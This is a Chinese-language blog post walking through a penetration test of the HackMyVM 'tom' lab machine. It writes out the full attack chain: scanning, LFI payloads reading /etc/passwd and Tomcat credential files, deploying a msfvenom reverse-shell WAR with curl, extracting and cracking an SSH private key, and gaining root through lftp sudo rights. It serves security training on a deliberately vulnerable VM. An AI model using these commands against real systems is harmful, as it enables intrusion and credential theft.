freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-tom
知非 2022-04-17 10:32:09 124620
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

KALI攻击机:192.168.1.128

靶机:192.168.1.69

目标:root.txt和user.txt

nmap -A -p1-65535 192.168.1.69

1650162336_625b7aa0a930f61f9bc2b.png!small?1650162338267

开启了22端口,80端口和8080端口:

访问下80端口和8080端口,看看!

http://192.168.1.69/

1650162343_625b7aa76b510af0e0083.png!small?1650162344731

http://192.168.1.69:8080/

1650162349_625b7aad354591a724ad3.png!small?1650162350633

漏洞利用阶段

试了一下弱口令,无法登录!

1650162359_625b7ab7e69fdc66ace6e.png!small?1650162361232

接着目录扫描,走起!

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.69 -x txt,html,php

1650162372_625b7ac46b9e027a9d71d.png!small?1650162373943

1650162377_625b7ac93bd8c04467f70.png!small?1650162378584

http://192.168.1.69/tomcat.php

访问白屏,而且,SIZE是0,考虑下系统命令执行漏洞!

wfuzz -c --hc=404 --hh=0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://192.168.1.69/tomcat.php?FUZZ=pwd

考了大佬的WP,由于tomcat的密码在配置文件中明文保存,因此这里大概率存在本地包含漏洞直接可以读取tomcat的配置文件。

所以真正的FUZZ命令如下:

wfuzz -c --hc=404 --hh=0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://192.168.1.69/tomcat.php?FUZZ=/etc/passwd

1650162397_625b7addcf578f193f9f0.png!small?1650162399254

http://192.168.1.69/tomcat.php?filez=/etc/passwd

1650162403_625b7ae38bef0db871869.png!small?1650162404946

可见两个用户:nathan和root!这估计是后续需要提权到的用户!

试下直接读取flag:

http://192.168.1.69/tomcat.php?filez=/root/root.txt

http://192.168.1.69/tomcat.php?filez=/home/nathan/user.txt

嘿嘿嘿,想多了,肯定不行,因为我们当前用户是那个tomcat那个用户!!

还是老老实实的读取tomcat的配置文件吧,由于前文的界面显示tomcat9,我们搜一下tomcat9配置文件的路径!

知识点:/etc/systemd/system是创建服务的默认的linux路径,该文件是服务名.service

本次服务是tomcat,其下服务tomcat.service

1650162414_625b7aee3c5ae108066aa.png!small?1650162415844

LFI路径:/etc/systemd/system/tomcat.service

查询tomcat服务信息:

http://192.168.1.69/tomcat.php?filez=/etc/systemd/system/tomcat.service

默认路径是:/opt/tomcat/latest

1650162458_625b7b1aa447a45075467.png!small?1650162460068

经查询:配置文件路径为/conf/tomcat-users.xml

http://192.168.1.69/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml

1650162466_625b7b22094c4878aec9b.png!small?1650162467344

Tomcat身份鉴别信息:

用户名:sml

密码:H4ckMyP4$$w0rD!!!

访问:

http://192.168.1.69:8080/

点击host-manager,输入用户名和密码:

1650162477_625b7b2de155912096256.png!small?1650162479219

http://192.168.1.69:8080/host-manager/html

1650162483_625b7b33d19c5f8351d7c.png!small?1650162485169

但是tomcat反弹shell需要登录manager,但是这里无法登录!

http://192.168.1.69:8080/manager/html

1650162490_625b7b3a80ee42f7d2020.png!small?1650162492062

权限不够,通过文件路径来上传!

首先,采用msfvenom生成反弹shell!

1650162495_625b7b3fd5da126fb18c3.png!small?1650162497183

-p, --payload <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom

1650162500_625b7b44d25f8fd67d44e.png!small?1650162502237

然后,就是上传反弹shell!!!

curl --upload-file shell.war -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.1.69:8080/manager/text/deploy?path=/shell'

1650162506_625b7b4a71f27c8fa50e9.png!small?1650162507768

监听端口:

1650162512_625b7b50a41914388afe0.png!small?1650162513957

触发反弹shell!!

http://192.168.1.69:8080/shell/

1650162518_625b7b56856921b6c99df.png!small?1650162519923

修改为python交互shell!

python3 -c 'import pty; pty.spawn("/bin/bash")'

1650162523_625b7b5b758caeaab8932.png!small?1650162524867

接着就需要提权到那个账户了!!

1650162528_625b7b60b018412207f0c.png!small?1650162530122

这个就是传说中的BASE85了,我的思路是通过这个命令读取nathan账户的id_rsa,然后再BASE85解码!就可以连接到nathan账户了!!

sudo -u nathan ascii85 /home/nathan/.ssh/id_rsa | ascii85 -d

1650162534_625b7b66b1af99925c2b2.png!small?1650162536500

保存为nathan_rsa,修改权限chmod 600 nathan_rsa

连接下:这个key有密码?!

1650162542_625b7b6ec781f6593751c.png!small?1650162544125

这里有两种方法进行破解!

第一:

python3 /usr/share/john/ssh2john.py nathan_rsa >hash

john hash

1650162548_625b7b74413f1d2cfeb6e.png!small?1650162549767

第二:采用RSAcrack工具:

工具地址:

https://github.com/d4t4s3c/RSAcrack

这里有个有趣的事情!工具和靶机是同一个作者!

1650162553_625b7b79dce807c2ad662.png!small?1650162555208

1650162558_625b7b7eb519e7bf5b75a.png!small?1650162560083

./RSAcrack.sh -w rockyou.txt -k nathan_rsa

1650162563_625b7b835fc912eef7b86.png!small?1650162564797

连接nathan用户:

1650162568_625b7b88a94f493e9069f.png!small?1650162570003

1650162580_625b7b94397363b5d4cbf.png!small?1650162581552

第一个flag:

cat user.txt

SK6sh************sEo2R2Qfo49

权限提升阶段

最后就是需要提权到root了!!!

1650162603_625b7bab2579768533570.png!small?1650162604521

网站走起:https://gtfobins.github.io/gtfobins/lftp/

1650162608_625b7bb021eaa142e7288.png!small?1650162609438

1650162613_625b7bb55ef6befadeb5c.png!small?1650162614945

最后的flag:

cat r00t.txt

55djsN*****************uIlbg9

# 渗透测试 # web安全 # 网络安全技术 # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录